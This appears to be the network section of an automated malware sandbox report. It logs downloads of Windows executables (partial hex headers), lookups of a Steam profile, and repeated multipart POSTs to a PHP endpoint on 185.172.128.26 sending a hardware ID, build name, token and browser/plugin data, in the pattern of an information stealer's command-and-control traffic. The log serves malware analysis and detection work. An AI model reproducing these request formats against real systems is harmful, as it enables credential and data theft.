Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:36 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:37 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:38 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 08:15:39 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 08:16:13 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 23 Mar 2024 02:26:34 GMTETag: "1aa00-6144aab47aa80"Accept-Ranges: bytesContent-Length: 109056Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 45 86 8a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 32 01 00 00 76 00 00 00 00 00 00 8a 51 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 37 51 01 00 4f 00 00 00 00 60 01 00 20 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 a0 50 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 31 01 00 00 20 00 00 00 32 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 73 00 00 00 60 01 00 00 74 00 00 00 34 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 02 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6b 51 01 00 00 00 00 00 48 00 00 00 02 00 05 00 64 30 00 00 b4 39 00 00 03 00 02 00 08 00 00 06 18 6a 00 00 88 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 03 20 34 02 00 00 14 14 04 28 16 00 00 0a 2a 32 03 04 16 14 14 05 6f 17 00 00 0a 2a 3a 03 04 05 16 14 14 0e 04 6f 18 00 00 0a 2a 13 30 09 00 2c 00 00 00 00 00 00 00 04 6f 19 00 00 0a 72 01 00 00 70 20 24 01 00 00 14 04 18 8d 16 00 00 01 25 16 03 a2 25 17 05 a2 14 6f 1a 00 00 0a 74 1a 00 00 01 2a 26 03 04 05 6f 1b 00 00 0a 2a 1e 02 28 1c 00 00 0a 2a 4a 02 72 21 00 00 70 18 73 1d 00 00 0a 28 1e 00 00 0a 2a 4a 73 09 00 00 06 25 6f 07 00 00 06 6f 1f 00 00 0a 26 2a 1e 02 28 20 00 00 0a 2a 36 02 28 21 00 00 0a 02 28 0b 00 00 06 2a 00 00 13 30 02 00 24 00 00 00 01 00 00 11 02 7b 02 00 00 04 2c 01 2a 02 17 7d 02 00 00 04 72 4b 00 00 70 18 73 1d 00 00 0a 0a 02 06 28 22 00 00 0a 2a 66 03 17 33 0d 02 04 74 04 00 00 02 7d 01 00 00 04 2a 02 17 7d 02 00 00 04 2a 1e 02 28 23 00 00 0a 2a ae 7e 03 00 00 04 2d 1e 72 a3 00 00 70 d0 05 00 00 02 28 24 00 00 0a 6f 25 00 00 0a 73 26 00 00 0a 80 03 00 00 04 7e 03 00 00 04 2a 1a 7e 04 00 00 04 2a 1e 02 80 04 00 00 04 2a 1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFHost: 185.172.128.26Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 38 38 30 30 32 35 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="hwid"18E8800250C53528003197------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="build"default7------EGIDHDGCBFBKECBFHCAF--
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: 185.172.128.26Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 2d 2d 0d 0a Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="message"browsers------IEHDBAAFIDGDAAAAAAAA--
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBFCAFCBKFIEBFHIDBHost: 185.172.128.26Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 2d 2d 0d 0a Data Ascii: ------KKFBFCAFCBKFIEBFHIDBContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------KKFBFCAFCBKFIEBFHIDBContent-Disposition: form-data; name="message"plugins------KKFBFCAFCBKFIEBFHIDB--
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: 185.172.128.26Content-Length: 7631Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 185.172.128.26Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 185.172.128.26Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 185.172.128.26Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 48 4e 6e 5a 32 56 6e 5a 57 63 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"ZHNnZ2VnZWcuZmlsZQ==------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file"------DBKKFCBAKKFBGCBFHJDG--
